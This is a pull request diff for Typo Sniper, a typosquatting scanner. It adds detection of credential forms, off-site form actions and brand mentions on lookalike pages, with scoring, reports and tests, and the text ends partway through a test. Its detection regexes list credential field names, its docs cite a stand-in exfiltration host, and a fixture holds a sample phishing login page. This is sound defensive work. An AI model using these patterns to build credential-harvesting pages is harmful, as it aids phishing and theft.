### PR TITLE
Detect what a suspicious page is built to collect (v2.1.0)

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -5,6 +5,72 @@ All notable changes to Typo Sniper are documented in this file.
 The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/),
 and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
 
+## [2.1.0] - 2026-08-27
+
+The scanner can now see what a suspicious page is built to *do*, not just that
+it exists.
+
+### Added
+
+- **Credential-form detection.** A registered lookalike tells you someone
+  bought a domain. A lookalike serving a form with a password field tells you
+  what they bought it for. That is the difference between a finding worth
+  watching and one worth a takedown request this afternoon, and until now the
+  scanner could not see it — it read the page title and nothing else.
+
+  The HTTP probe already read the page body to extract `<title>`, so this costs
+  **no extra request**. It reports whether the page collects a password,
+  whether it pairs that with a username or email field, how many forms it has,
+  and whether the page names the brand it is imitating.
+
+  A `type="text"` field named `passwd`, `otp`, `cvv` or `card_number` counts:
+  changing the input type is a one-character edit, and the field name gives the
+  intent away.
+
+- **Off-site form actions.** A form on `examp1e.com` that POSTs to
+  `collector.evil.test` is an exfiltration path, not a login page. Comparison
+  is by registrable domain via the Public Suffix List, so `login.examp1e.com`
+  is correctly *not* flagged as off-site.
+
+- **A credential form appearing now raises an `ESCALATED` change.** That
+  transition — a parked lookalike becoming a live collection point — is the
+  most actionable thing this tool can report, and it is now persisted in scan
+  history so the diff engine can see it. So is a form that starts submitting
+  off-site.
+
+- **Five new ML features** and new evidence lines in the AI prompt, both
+  drawn from the same analysis. The page findings are derived by our own
+  parser from the fetched markup rather than copied from attacker-supplied
+  text, which makes them the most trustworthy lines in the prompt's data block.
+
+- **A `Page` column** in the CSV, Excel, and HTML reports.
+
+### Changed
+
+- **Risk scoring is weighted so page findings dominate**, which they should: a
+  credential form adds 30, an off-site form action 15, and a brand mention 10
+  — but only alongside something that actually collects. A fan page naming a
+  brand is not a phishing kit, and scoring it like one would train operators to
+  ignore the signal.
+
+- **The feature set changed, so previously trained ranking models are
+  refused** with a message to retrain, rather than silently scoring a
+  mismatched vector. That guard was added in 1.5.0 for exactly this case.
+
+### Security
+
+- **Parsing uses the standard library's `HTMLParser`, not a third-party
+  parser.** This is attacker-authored markup by definition, so the smaller and
+  more boring the parsing surface, the better: no external entity resolution,
+  no network fetches, no recovery heuristics that could be steered.
+
+- **Every collection is bounded** — forms, inputs, and text — because a page
+  designed to be parsed slowly is a cheap way to stall a scan. The body was
+  already capped at `http_max_bytes`.
+
+- **A page that breaks the parser is reported as truncated**, not as a clean
+  reading. "No password field found" and "we stopped looking" are different
+  claims, and the AI prompt says which one it is.
 ## [2.0.0] - 2026-08-27
 
 Typo Sniper is now installable. `pip install typo-sniper` gets you a

--- a/README.md
+++ b/README.md
@@ -40,6 +40,7 @@ Detect and monitor typosquatting domains targeting your brand with powerful auto
 - [Troubleshooting](#troubleshooting)
 - [Contributing](#-contributing)
 - [AI-Assisted Triage](#-ai-assisted-triage) 🤖
+- [Page Analysis](#-page-analysis) 🔎
 - [Learned Triage Ranking](#-learned-triage-ranking) 🧠
 - [Alerting and Ticketing](#-alerting-and-ticketing) 🔔
 - [Secrets Management](#-secrets-management) 🔐
@@ -957,6 +958,45 @@ worried about. For teams that cannot send that to a third party, a local model
 is the difference between using this feature and disabling it.
 
 See **[AI Analysis](docs/guides/AI_ANALYSIS.md)** for the full guide.
+
+**[⬆ Back to Top](#-table-of-contents)**
+
+---
+
+## 🔎 Page Analysis
+
+A registered lookalike tells you someone bought a domain. A lookalike serving a
+form with a password field tells you **what they bought it for**.
+
+On by default, and it costs no extra request — the HTTP probe already reads the
+page body to pull out `<title>`, so this reads the same bytes:
+
+| Signal | Why it matters |
+|---|---|
+| Credential form | Username/email paired with a password field — the phishing kit itself |
+| Password field | Present even without a matching username field |
+| Off-site form action | A form on `examp1e.com` POSTing to `collector.evil.test` is exfiltration, not login |
+| Brand mentioned | Only counted alongside something that collects |
+| Form count | Context for the above |
+
+A `type="text"` field named `passwd`, `otp`, `cvv`, or `card_number` counts —
+changing the input type is a one-character edit, and the name gives the intent
+away. Off-site comparison is by registrable domain via the Public Suffix List,
+so `login.examp1e.com` is correctly *not* flagged.
+
+**A credential form appearing raises an `ESCALATED` change.** That transition —
+a parked lookalike becoming a live collection point — is the most actionable
+thing this tool reports, and it is persisted in scan history so the diff engine
+can catch it between runs.
+
+Parsing uses the standard library's `HTMLParser` rather than a third-party
+parser. This is attacker-authored markup by definition, so the smaller and more
+boring the parsing surface, the better: no external entity resolution, no
+network fetches, no recovery heuristics that could be steered. Every collection
+is bounded, because a page designed to be parsed slowly is a cheap way to stall
+a scan. A page that breaks the parser is reported as **truncated** rather than
+as a clean reading — "no password field found" and "we stopped looking" are
+different claims.
 
 **[⬆ Back to Top](#-table-of-contents)**
 

--- a/config.yaml.example
+++ b/config.yaml.example
@@ -115,6 +115,13 @@ enable_http_probe: true            # Probe domains with HTTP/HTTPS
 http_timeout: 10                   # HTTP request timeout (seconds)
 http_max_bytes: 1048576            # Cap on probed response bodies (1 MiB)
 http_max_redirects: 5              # Maximum redirects to follow
+# Read what the fetched page appears built to collect: credential forms,
+# forms submitting to another domain, mentions of the brand. This costs no
+# extra request — the body is already in memory from the probe — and it is the
+# strongest single signal the scanner produces. Registering a lookalike is
+# cheap and ambiguous; standing up a form that asks for a password is neither.
+enable_page_analysis: true
+
 # TLS certificates are always validated. A domain that answers but presents an
 # untrusted certificate is reported as "Invalid/self-signed" in the TLS column
 # rather than being fetched over an unauthenticated connection.

--- a/docs/config.yaml.example
+++ b/docs/config.yaml.example
@@ -115,6 +115,13 @@ enable_http_probe: true            # Probe domains with HTTP/HTTPS
 http_timeout: 10                   # HTTP request timeout (seconds)
 http_max_bytes: 1048576            # Cap on probed response bodies (1 MiB)
 http_max_redirects: 5              # Maximum redirects to follow
+# Read what the fetched page appears built to collect: credential forms,
+# forms submitting to another domain, mentions of the brand. This costs no
+# extra request — the body is already in memory from the probe — and it is the
+# strongest single signal the scanner produces. Registering a lookalike is
+# cheap and ambiguous; standing up a form that asks for a password is neither.
+enable_page_analysis: true
+
 # TLS certificates are always validated. A domain that answers but presents an
 # untrusted certificate is reported as "Invalid/self-signed" in the TLS column
 # rather than being fetched over an unauthenticated connection.

--- a/src/typo_sniper/ai/prompts.py
+++ b/src/typo_sniper/ai/prompts.py
@@ -208,6 +208,23 @@ def describe_permutation(perm: dict[str, Any]) -> str:
         add('page_title', http.get('title'))
         add('redirects_to', http.get('redirects_to'))
 
+    # What the page is built to collect. These are derived by our own parser
+    # from the fetched markup, not copied from attacker-supplied text, so they
+    # are the most trustworthy lines in this block.
+    page = http.get('page') or {}
+    if page.get('parse_ok'):
+        add('page_has_credential_form', page.get('is_credential_form'))
+        add('page_has_password_field', page.get('has_password_input'))
+        add('page_form_count', page.get('form_count'))
+        if page.get('external_form_action'):
+            add('page_form_submits_to_other_domains',
+                ', '.join(page.get('form_action_hosts') or []))
+        add('page_mentions_the_brand', page.get('brand_mentioned'))
+        if page.get('parse_truncated'):
+            add('page_parse_incomplete',
+                'the page could not be fully parsed; absence of a finding here '
+                'is not evidence of absence')
+
     if ct.get('certificates_found'):
         add('certificates_in_ct_logs', ct['certificates_found'])
 

--- a/src/typo_sniper/config.py
+++ b/src/typo_sniper/config.py
@@ -171,6 +171,10 @@ class Config:
     http_timeout: int = 10
     http_max_bytes: int = 1_048_576  # Cap on probed response bodies (1 MiB)
     http_max_redirects: int = 5
+    # Read what the fetched page appears built to collect: credential forms,
+    # off-site form actions, brand mentions. Costs no extra request; the body
+    # is already in memory from the probe.
+    enable_page_analysis: bool = True
     user_agent: str = (
         f'TypoSniper/{__version__} (+https://github.com/ChiefGyk3D/typo-sniper)'
     )

--- a/src/typo_sniper/exporters.py
+++ b/src/typo_sniper/exporters.py
@@ -41,7 +41,7 @@ def format_threat_intel(perm: dict[str, Any]) -> dict[str, Any]:
         Dictionary with 'urlscan', 'urlscan_url', 'ct', and 'http' keys
     """
     summary = {'urlscan': '', 'urlscan_url': None, 'ct': '', 'http': '', 'tls': '',
-               'mail': ''}
+               'mail': '', 'page': ''}
 
     # Mail capability lives beside threat_intel, not inside it
     mail = perm.get('mail_intel') or {}
@@ -91,6 +91,15 @@ def format_threat_intel(perm: dict[str, Any]) -> dict[str, Any]:
             summary['ct'] = f'{cert_count} cert(s)'
         else:
             summary['ct'] = ct_data.get('status', '') or '0'
+
+    # --- What the page collects ---
+    # Derived by our own parser from the fetched markup, so unlike the page
+    # title this line is not attacker-authored text.
+    page_data = (threat_intel.get('http_probe') or {}).get('page')
+    if page_data and page_data.get('parse_ok'):
+        from .page_analysis import describe
+
+        summary['page'] = describe(page_data)
 
     # --- HTTP probe ---
     http_data = threat_intel.get('http_probe')
@@ -248,7 +257,8 @@ class ExcelExporter(BaseExporter):
         # Headers
         headers = [
             "Scan Date", "Original Domain", "Permutation", "Fuzzer Type",
-            "Risk Score", "Age (days)", "Mail", "URLScan Status", "CT Logs", "HTTP Status", "TLS",
+            "Risk Score", "Age (days)", "Mail", "Page", "URLScan Status", "CT Logs",
+            "HTTP Status", "TLS",
             "Created Date", "Updated Date", "Expires Date",
             "Registrant", "Organization", "Registrar",
             "Email", "Country", "Status",
@@ -298,6 +308,7 @@ class ExcelExporter(BaseExporter):
                     risk_score,
                     perm.get('created_days_ago', ''),
                     intel['mail'],
+                    intel['page'],
                     urlscan_status,
                     intel['ct'],
                     intel['http'],
@@ -453,8 +464,8 @@ class CSVExporter(BaseExporter):
             # Write headers
             headers = [
                 'Scan Date', 'Original Domain', 'Permutation', 'Fuzzer Type',
-                'Risk Score', 'Age (days)', 'Mail', 'URLScan Status', 'URLScan Report',
-                'CT Logs', 'HTTP Status', 'TLS',
+                'Risk Score', 'Age (days)', 'Mail', 'Page', 'URLScan Status',
+                'URLScan Report', 'CT Logs', 'HTTP Status', 'TLS',
                 'Created Date', 'Updated Date', 'Expires Date',
                 'Registrant', 'Organization', 'Registrar',
                 'Emails', 'Country', 'Status',
@@ -478,6 +489,7 @@ class CSVExporter(BaseExporter):
                         perm.get('risk_score', ''),
                         perm.get('created_days_ago', ''),
                         intel['mail'],
+                        intel['page'],
                         intel['urlscan'],
                         intel['urlscan_url'] or '',
                         intel['ct'],
@@ -697,6 +709,7 @@ class HTMLExporter(BaseExporter):
                         <th>Risk</th>
                         <th>Age (days)</th>
                         <th>Mail</th>
+                        <th>Page</th>
                         <th>URLScan Status</th>
                         <th>CT Logs</th>
                         <th>HTTP Status</th>
@@ -746,6 +759,7 @@ class HTMLExporter(BaseExporter):
                         <td>{html.escape(str(perm.get('risk_score', '')))}</td>
                         <td>{age_cell}</td>
                         <td>{html.escape(intel['mail'])}</td>
+                        <td>{html.escape(intel['page'])}</td>
                         <td>{urlscan_cell}</td>
                         <td>{html.escape(intel['ct'])}</td>
                         <td>{html.escape(intel['http'])}</td>

--- a/src/typo_sniper/ml/features.py
+++ b/src/typo_sniper/ml/features.py
@@ -97,6 +97,11 @@ FEATURE_NAMES = (
     'title_parked_words',
     'certificates_log',
     'urlscan_malicious',
+    'has_credential_form',
+    'has_password_input',
+    'external_form_action',
+    'form_count',
+    'brand_mentioned_on_page',
 )
 
 FEATURE_COUNT = len(FEATURE_NAMES)
@@ -182,6 +187,7 @@ def extract(perm: dict[str, Any], monitored_domain: str) -> list[float]:
     http = threat.get('http_probe') or {}
     ct = threat.get('certificate_transparency') or {}
     urlscan = threat.get('urlscan') or {}
+    page = http.get('page') or {}
 
     def field(key, http_key=None, default=None):
         if key in perm:
@@ -259,6 +265,17 @@ def extract(perm: dict[str, Any], monitored_domain: str) -> list[float]:
         'urlscan_malicious': float(bool(
             urlscan.get('malicious') or perm.get('urlscan_malicious')
         )),
+        # Page analysis, read from either the live record's nested shape or
+        # the flattened history snapshot, like every other field here.
+        'has_credential_form': float(bool(
+            page.get('is_credential_form') or perm.get('is_credential_form')
+        )),
+        'has_password_input': float(bool(page.get('has_password_input'))),
+        'external_form_action': float(bool(
+            page.get('external_form_action') or perm.get('external_form_action')
+        )),
+        'form_count': min(float(page.get('form_count') or 0), 5.0) / 5.0,
+        'brand_mentioned_on_page': float(bool(page.get('brand_mentioned'))),
     }
 
     return [float(values[fname]) for fname in FEATURE_NAMES]

--- a/src/typo_sniper/page_analysis.py
+++ b/src/typo_sniper/page_analysis.py
@@ -1,0 +1,277 @@
+"""
+What a suspicious page is actually built to do.
+
+A registered lookalike tells you someone bought a domain. A lookalike serving a
+form with a password field tells you what they bought it for. That is the
+difference between a finding worth watching and a finding worth a takedown
+request this afternoon, and until now the scanner could not see it: it read the
+page title and nothing else.
+
+This module reads the HTML already fetched by the HTTP probe — no extra request
+— and answers a narrow set of questions:
+
+  * Does the page collect a password? Credentials are the point of most
+    typosquatting, and a password input is the least deniable evidence of it.
+  * Where does the form submit to? A form on ``examp1e.com`` that POSTs to a
+    third domain is an exfiltration path, not a login page.
+  * Does the page name the brand it is imitating?
+
+Parsing is done with the standard library's HTMLParser rather than a
+third-party parser. This is attacker-authored markup by definition, so the
+smaller and more boring the parsing surface, the better: no external entity
+resolution, no network fetches, no recovery heuristics that could be steered.
+Every collection is bounded, because a page designed to be parsed slowly is a
+cheap way to stall a scan.
+"""
+
+# SPDX-License-Identifier: AGPL-3.0-or-later
+# Copyright (C) 2026 ChiefGyk3D
+# Typo Sniper is dual-licensed; see COMMERCIAL.md for commercial terms.
+
+import logging
+import re
+from html.parser import HTMLParser
+from typing import Any
+from urllib.parse import urlparse
+
+# Bounds. A hostile page must not be able to make parsing expensive.
+MAX_FORMS = 50
+MAX_INPUTS = 300
+MAX_TEXT_CHARS = 20_000
+
+# Input names and ids that mean "credential" even when the type does not say so
+_CREDENTIAL_NAMES = re.compile(
+    r'pass|pwd|passwd|secret|otp|mfa|2fa|token|pin\b|cvv|card|ssn|account',
+    re.IGNORECASE,
+)
+_USERNAME_NAMES = re.compile(
+    r'user|login|email|e-mail|signin|sign_in|account|member',
+    re.IGNORECASE,
+)
+
+# Tags whose contents are not visible text
+_INVISIBLE = {'script', 'style', 'noscript', 'template', 'head'}
+
+logger = logging.getLogger(__name__)
+
+
+class _PageParser(HTMLParser):
+    """Collect forms, inputs, and visible text from one page."""
+
+    def __init__(self):
+        # convert_charrefs keeps entity decoding in the standard library rather
+        # than in anything hand-rolled here.
+        super().__init__(convert_charrefs=True)
+        self.forms: list[dict[str, Any]] = []
+        self.inputs: list[dict[str, str]] = []
+        self.text_parts: list[str] = []
+        self._text_len = 0
+        self._suppress = 0
+        self._current_form: dict[str, Any] | None = None
+
+    def handle_starttag(self, tag, attrs):
+        attributes = {k.lower(): (v or '') for k, v in attrs}
+
+        if tag in _INVISIBLE:
+            self._suppress += 1
+            return
+
+        if tag == 'form' and len(self.forms) < MAX_FORMS:
+            self._current_form = {
+                'action': attributes.get('action', ''),
+                'method': attributes.get('method', 'get').lower(),
+                'inputs': [],
+            }
+            self.forms.append(self._current_form)
+
+        elif tag in ('input', 'select', 'textarea') and len(self.inputs) < MAX_INPUTS:
+            field = {
+                'type': attributes.get('type', 'text').lower(),
+                'name': attributes.get('name', ''),
+                'id': attributes.get('id', ''),
+                'autocomplete': attributes.get('autocomplete', '').lower(),
+                'placeholder': attributes.get('placeholder', ''),
+            }
+            self.inputs.append(field)
+            if self._current_form is not None:
+                self._current_form['inputs'].append(field)
+
+    def handle_startendtag(self, tag, attrs):
+        self.handle_starttag(tag, attrs)
+
+    def handle_endtag(self, tag):
+        if tag in _INVISIBLE and self._suppress:
+            self._suppress -= 1
+        elif tag == 'form':
+            self._current_form = None
+
+    def handle_data(self, data):
+        if self._suppress or self._text_len >= MAX_TEXT_CHARS:
+            return
+        stripped = data.strip()
+        if stripped:
+            self.text_parts.append(stripped)
+            self._text_len += len(stripped)
+
+    # A malformed page must not raise out of the parser
+    def error(self, message):  # pragma: no cover - HTMLParser legacy hook
+        pass
+
+
+def _registrable(host: str) -> str:
+    """
+    Reduce a host to something comparable across subdomains.
+
+    Uses the Public Suffix List already vendored for permutation generation, so
+    ``login.example.co.uk`` and ``example.co.uk`` compare equal while
+    ``example.github.io`` and ``other.github.io`` do not.
+    """
+    host = (host or '').lower().strip('.')
+    if not host:
+        return ''
+    try:
+        from publicsuffixlist import PublicSuffixList
+
+        return PublicSuffixList().privatesuffix(host) or host
+    except Exception:
+        # Never let suffix lookup failure cost the whole analysis
+        parts = host.split('.')
+        return '.'.join(parts[-2:]) if len(parts) >= 2 else host
+
+
+def _field_is_credential(field: dict[str, str]) -> bool:
+    if field.get('type') == 'password':
+        return True
+    if 'current-password' in field.get('autocomplete', ''):
+        return True
+    if 'new-password' in field.get('autocomplete', ''):
+        return True
+    blob = f"{field.get('name', '')} {field.get('id', '')} {field.get('placeholder', '')}"
+    return bool(_CREDENTIAL_NAMES.search(blob))
+
+
+def _field_is_username(field: dict[str, str]) -> bool:
+    if field.get('type') == 'email':
+        return True
+    blob = f"{field.get('name', '')} {field.get('id', '')} {field.get('placeholder', '')}"
+    return bool(_USERNAME_NAMES.search(blob))
+
+
+def analyse(
+    html: str, probed_url: str = '', monitored_domain: str = ''
+) -> dict[str, Any]:
+    """
+    Describe what a fetched page appears built to collect.
+
+    Args:
+        html: Raw page source, already length-bounded by the caller
+        probed_url: The URL the body came from, for resolving relative actions
+        monitored_domain: The brand being defended, for mention counting
+
+    Returns:
+        A summary dictionary; never raises on malformed input
+    """
+    result: dict[str, Any] = {
+        'form_count': 0,
+        'has_password_input': False,
+        'has_username_input': False,
+        'is_credential_form': False,
+        'external_form_action': False,
+        'form_action_hosts': [],
+        'brand_mentioned': False,
+        'brand_mention_count': 0,
+        'input_types': [],
+        'parse_ok': False,
+        'parse_truncated': False,
+    }
+
+    if not html:
+        return result
+
+    parser = _PageParser()
+    try:
+        parser.feed(html)
+        parser.close()
+    except Exception as e:
+        # A page that breaks the parser is still a page we saw, so whatever was
+        # collected before the failure is kept. It is flagged as truncated
+        # rather than passed off as a complete reading: "no password field
+        # found" and "we stopped looking" are different claims.
+        result['parse_truncated'] = True
+        logger.debug('Page parsing ended early (%s)', type(e).__name__)
+
+    result['parse_ok'] = True
+    result['form_count'] = len(parser.forms)
+    result['input_types'] = sorted({f['type'] for f in parser.inputs if f['type']})[:15]
+
+    has_password = any(_field_is_credential(f) for f in parser.inputs)
+    has_username = any(_field_is_username(f) for f in parser.inputs)
+    result['has_password_input'] = has_password
+    result['has_username_input'] = has_username
+
+    # A credential form is the pairing: somewhere to type who you are and
+    # somewhere to type the secret that proves it.
+    result['is_credential_form'] = any(
+        any(_field_is_credential(f) for f in form['inputs'])
+        and any(_field_is_username(f) for f in form['inputs'])
+        for form in parser.forms
+    ) or (has_password and has_username)
+
+    probed_host = _registrable(urlparse(probed_url).hostname or '')
+    hosts = []
+    for form in parser.forms:
+        action = (form.get('action') or '').strip()
+        if not action:
+            continue
+        parsed = urlparse(action)
+        if not parsed.hostname:
+            continue  # relative action: same origin
+        host = _registrable(parsed.hostname)
+        if host and host not in hosts:
+            hosts.append(host)
+        # A form that posts somewhere else entirely is an exfiltration path,
+        # not a login page, and it is worth saying so plainly.
+        if probed_host and host and host != probed_host:
+            result['external_form_action'] = True
+
+    result['form_action_hosts'] = hosts[:5]
+
+    brand = (monitored_domain or '').split('.')[0].lower()
+    if brand and len(brand) >= 3:
+        text = ' '.join(parser.text_parts).lower()
+        count = text.count(brand)
+        result['brand_mention_count'] = min(count, 99)
+        result['brand_mentioned'] = count > 0
+
+    return result
+
+
+def describe(analysis: dict[str, Any] | None) -> str:
+    """
+    A short human-readable summary for reports.
+
+    Args:
+        analysis: Output of ``analyse``, or None
+
+    Returns:
+        One line describing the page's apparent purpose
+    """
+    if not analysis or not analysis.get('parse_ok'):
+        return ''
+
+    parts = []
+    if analysis.get('is_credential_form'):
+        parts.append('credential form')
+    elif analysis.get('has_password_input'):
+        parts.append('password field')
+    elif analysis.get('form_count'):
+        parts.append(f"{analysis['form_count']} form(s)")
+
+    if analysis.get('external_form_action'):
+        hosts = ', '.join(analysis.get('form_action_hosts') or [])
+        parts.append(f'submits off-site ({hosts})' if hosts else 'submits off-site')
+
+    if analysis.get('brand_mentioned'):
+        parts.append('names the brand')
+
+    return '; '.join(parts)

--- a/src/typo_sniper/scanner.py
+++ b/src/typo_sniper/scanner.py
@@ -148,7 +148,7 @@ class DomainScanner:
                     perm['sounds_alike'] = False
 
         # Add threat intelligence
-        enriched = await self._add_threat_intelligence(enriched)
+        enriched = await self._add_threat_intelligence(enriched, domain)
 
         # Mail capability: whether a lookalike is provisioned to send
         # deliverable mail, which is the clearest pre-phishing signal
@@ -414,7 +414,9 @@ class DomainScanner:
         except (TimeoutError, socket.gaierror, UnicodeError, OSError):
             return None
     
-    async def _add_threat_intelligence(self, permutations: list[dict[str, Any]]) -> list[dict[str, Any]]:
+    async def _add_threat_intelligence(
+        self, permutations: list[dict[str, Any]], monitored_domain: str = ''
+    ) -> list[dict[str, Any]]:
         """
         Add threat intelligence to permutations.
         
@@ -435,6 +437,10 @@ class DomainScanner:
         self.logger.info(f"Gathering threat intelligence for {len(permutations)} domains")
         
         async with ThreatIntelligence(self.config) as threat_intel:
+            # So page analysis can tell whether a page names the brand it is
+            # imitating, which a generic parked page never does.
+            threat_intel.monitored_domain = monitored_domain
+
             tasks = []
             for perm in permutations:
                 task = threat_intel.analyze_domain(perm['domain'])

--- a/src/typo_sniper/state.py
+++ b/src/typo_sniper/state.py
@@ -145,6 +145,11 @@ class ScanHistory:
             'certificates_found': ct.get('certificates_found', 0),
             'urlscan_malicious': bool(urlscan.get('malicious')),
             'mail_posture': (perm.get('mail_intel') or {}).get('posture'),
+            # Persisted so that a credential form *appearing* on a domain that
+            # was previously parked raises a change. That transition is the
+            # moment a watched lookalike becomes an active threat.
+            'is_credential_form': bool((http.get('page') or {}).get('is_credential_form')),
+            'external_form_action': bool((http.get('page') or {}).get('external_form_action')),
         }
 
     # -- diffing -----------------------------------------------------------
@@ -252,6 +257,27 @@ class ScanHistory:
                 'domain': name,
                 'risk_score': now.get('risk_score'),
                 'detail': 'added mail servers (MX)',
+                'current': now,
+            })
+
+        # A credential form appearing is the single most actionable transition
+        # this tool can report: the domain stopped being a possibility and
+        # started being a live collection point.
+        if now.get('is_credential_form') and not before.get('is_credential_form'):
+            changes.append({
+                'kind': ESCALATED,
+                'domain': name,
+                'risk_score': now.get('risk_score'),
+                'detail': 'now serves a credential form (username and password fields)',
+                'current': now,
+            })
+
+        if now.get('external_form_action') and not before.get('external_form_action'):
+            changes.append({
+                'kind': ESCALATED,
+                'domain': name,
+                'risk_score': now.get('risk_score'),
+                'detail': 'a form on this page now submits to a different domain',
                 'current': now,
             })
 

--- a/src/typo_sniper/threat_intelligence.py
+++ b/src/typo_sniper/threat_intelligence.py
@@ -17,6 +17,8 @@ from urllib.parse import quote
 
 import aiohttp
 
+from . import page_analysis
+
 # Matches <title ...>...</title> across newlines and with attributes present
 _TITLE_RE = re.compile(r'<title[^>]*>(.*?)</title>', re.IGNORECASE | re.DOTALL)
 
@@ -34,6 +36,9 @@ class ThreatIntelligence:
         self.config = config
         self.logger = logging.getLogger(__name__)
         self.session = None
+        # Set per scan so page analysis can count mentions of the brand being
+        # defended. A lookalike that names its target is imitating it.
+        self.monitored_domain = ''
     
     async def __aenter__(self):
         """Async context manager entry."""
@@ -391,6 +396,7 @@ class ThreatIntelligence:
             'redirects_to': None,
             'title': None,
             'tls_verified': None,
+            'page': None,
         }
 
         # HTTPS first: a typosquat with a valid certificate is the higher signal
@@ -410,6 +416,9 @@ class ThreatIntelligence:
 
             if probe['title'] and not results['title']:
                 results['title'] = probe['title']
+
+            if probe.get('page') and not results.get('page'):
+                results['page'] = probe['page']
 
         return results if (results['http_active'] or results['https_active']) else None
     
@@ -444,10 +453,20 @@ class ThreatIntelligence:
                     'redirects_to': str(response.url) if response.history else None,
                     'title': None,
                     'tls_verified': True if is_https else None,
+                    'page': None,
                 }
 
                 if response.status == 200:
-                    result['title'] = await self._read_title(response)
+                    body = await self._read_body(response)
+                    if body:
+                        result['title'] = self._extract_title(body)
+                        if self.config.enable_page_analysis:
+                            # No extra request: the body is already in memory,
+                            # and what the page collects is the strongest
+                            # signal available about what it is for.
+                            result['page'] = page_analysis.analyse(
+                                body, str(response.url), self.monitored_domain
+                            )
 
                 return result
 
@@ -478,15 +497,15 @@ class ThreatIntelligence:
 
         return None
 
-    async def _read_title(self, response) -> str | None:
+    async def _read_body(self, response) -> str | None:
         """
-        Read at most ``http_max_bytes`` of a response and extract <title>.
+        Read at most ``http_max_bytes`` of a response body.
 
         Args:
             response: Open aiohttp response
 
         Returns:
-            The page title, or None
+            The decoded body, or None if it could not be read
         """
         try:
             chunks = []
@@ -497,14 +516,18 @@ class ThreatIntelligence:
                 if total >= self.config.http_max_bytes:
                     break
 
-            body = b''.join(chunks).decode('utf-8', errors='replace')
-            match = _TITLE_RE.search(body)
-            if match:
-                # Collapse whitespace so the title stays on one report row
-                return ' '.join(match.group(1).split())[:200]
+            return b''.join(chunks).decode('utf-8', errors='replace')
         except Exception as e:
-            self.logger.debug(f"Could not read title: {e}")
+            self.logger.debug(f"Could not read response body: {e}")
+            return None
 
+    @staticmethod
+    def _extract_title(body: str) -> str | None:
+        """Pull <title> out of a page body."""
+        match = _TITLE_RE.search(body or '')
+        if match:
+            # Collapse whitespace so the title stays on one report row
+            return ' '.join(match.group(1).split())[:200]
         return None
 
     async def analyze_domain(self, domain: str) -> dict[str, Any]:
@@ -630,6 +653,28 @@ def calculate_risk_score(domain_data: dict[str, Any], threat_intel: dict[str, An
         # A valid certificate on a lookalike domain means someone did the work
         if http.get('tls_verified') is True:
             score += 5
+
+        # --- What the page is built to collect -----------------------------
+        # This is the strongest single signal the scanner produces. Registering
+        # a lookalike is cheap and ambiguous; standing up a form that asks for
+        # a password is neither. Weighted to dominate accordingly.
+        page = http.get('page') or {}
+        if page.get('is_credential_form'):
+            score += 30
+        elif page.get('has_password_input'):
+            score += 20
+
+        if page.get('external_form_action'):
+            # A form posting to a different registrable domain is an
+            # exfiltration path, not a sign-in page.
+            score += 15
+
+        if page.get('brand_mentioned') and (
+            page.get('has_password_input') or page.get('form_count')
+        ):
+            # Naming the brand is only meaningful alongside something that
+            # collects: a fan page mentioning a brand is not a phishing kit.
+            score += 10
 
     # --- Certificate Transparency -----------------------------------------
     ct = threat_intel.get('certificate_transparency') or {}

--- a/src/typo_sniper/version.py
+++ b/src/typo_sniper/version.py
@@ -4,4 +4,4 @@
 # Copyright (C) 2026 ChiefGyk3D
 # Typo Sniper is dual-licensed; see COMMERCIAL.md for commercial terms.
 
-__version__ = "2.0.0"
+__version__ = "2.1.0"

--- a/tests/unit/test_exporters.py
+++ b/tests/unit/test_exporters.py
@@ -131,7 +131,7 @@ class TestFormatThreatIntel:
     def test_empty_intel(self):
         assert format_threat_intel({}) == {
             'urlscan': '', 'urlscan_url': None, 'ct': '', 'http': '', 'tls': '',
-            'mail': '',
+            'mail': '', 'page': '',
         }
 
     def test_urlscan_error_statuses(self):

--- a/tests/unit/test_page_analysis.py
+++ b/tests/unit/test_page_analysis.py
@@ -1,0 +1,198 @@
+"""
+Tests for reading what a suspicious page is built to collect.
+
+Every input here is attacker-authored markup, so alongside the detection cases
+this file asserts the two properties that keep parsing safe: malformed input
+never raises, and a hostile page cannot make parsing expensive.
+"""
+
+import pytest
+
+from typo_sniper.page_analysis import MAX_FORMS, MAX_INPUTS, analyse, describe
+
+PHISHING_PAGE = """
+<html><head><title>Sign in to Example</title></head><body>
+  <h1>Example Account Login</h1>
+  <form action="/session" method="post">
+    <input type="email" name="username" placeholder="Email address">
+    <input type="password" name="password">
+    <button type="submit">Sign in</button>
+  </form>
+</body></html>
+"""
+
+PARKED_PAGE = """
+<html><head><title>example-shop.com</title></head><body>
+  <h1>This domain is for sale</h1>
+  <p>Contact the broker to make an offer.</p>
+</body></html>
+"""
+
+
+class TestCredentialForms:
+    def test_detects_a_login_form(self):
+        result = analyse(PHISHING_PAGE, 'https://examp1e.com/', 'example.com')
+        assert result['is_credential_form'] is True
+        assert result['has_password_input'] is True
+        assert result['has_username_input'] is True
+
+    def test_a_parked_page_collects_nothing(self):
+        result = analyse(PARKED_PAGE, 'https://examp1e.com/', 'example.com')
+        assert result['is_credential_form'] is False
+        assert result['has_password_input'] is False
+        assert result['form_count'] == 0
+
+    def test_a_search_box_alone_is_not_a_credential_form(self):
+        """A form is not evidence of phishing; a form asking for a secret is."""
+        page = '<form action="/s"><input type="text" name="q"></form>'
+        result = analyse(page, 'https://examp1e.com/', 'example.com')
+        assert result['form_count'] == 1
+        assert result['is_credential_form'] is False
+
+    def test_a_newsletter_signup_is_not_a_credential_form(self):
+        page = '<form action="/sub"><input type="email" name="email"></form>'
+        result = analyse(page, 'https://examp1e.com/', 'example.com')
+        assert result['has_username_input'] is True
+        assert result['has_password_input'] is False
+        assert result['is_credential_form'] is False
+
+    @pytest.mark.parametrize('field', [
+        '<input type="password" name="p">',
+        '<input type="text" name="passwd">',
+        '<input type="text" name="user_pwd">',
+        '<input type="text" id="login-secret">',
+        '<input type="text" name="otp">',
+        '<input type="text" name="mfa_code">',
+        '<input type="text" autocomplete="current-password">',
+        '<input type="text" name="card_number">',
+        '<input type="text" name="cvv">',
+    ])
+    def test_credential_fields_hiding_as_text(self, field):
+        """type=text is a one-character change; the name still gives it away."""
+        page = f'<form><input type="email" name="u">{field}</form>'
+        assert analyse(page, 'https://x.com/', '')['is_credential_form'] is True
+
+    def test_select_and_textarea_are_counted(self):
+        page = ('<form><input type="email" name="u">'
+                '<textarea name="password_hint"></textarea></form>')
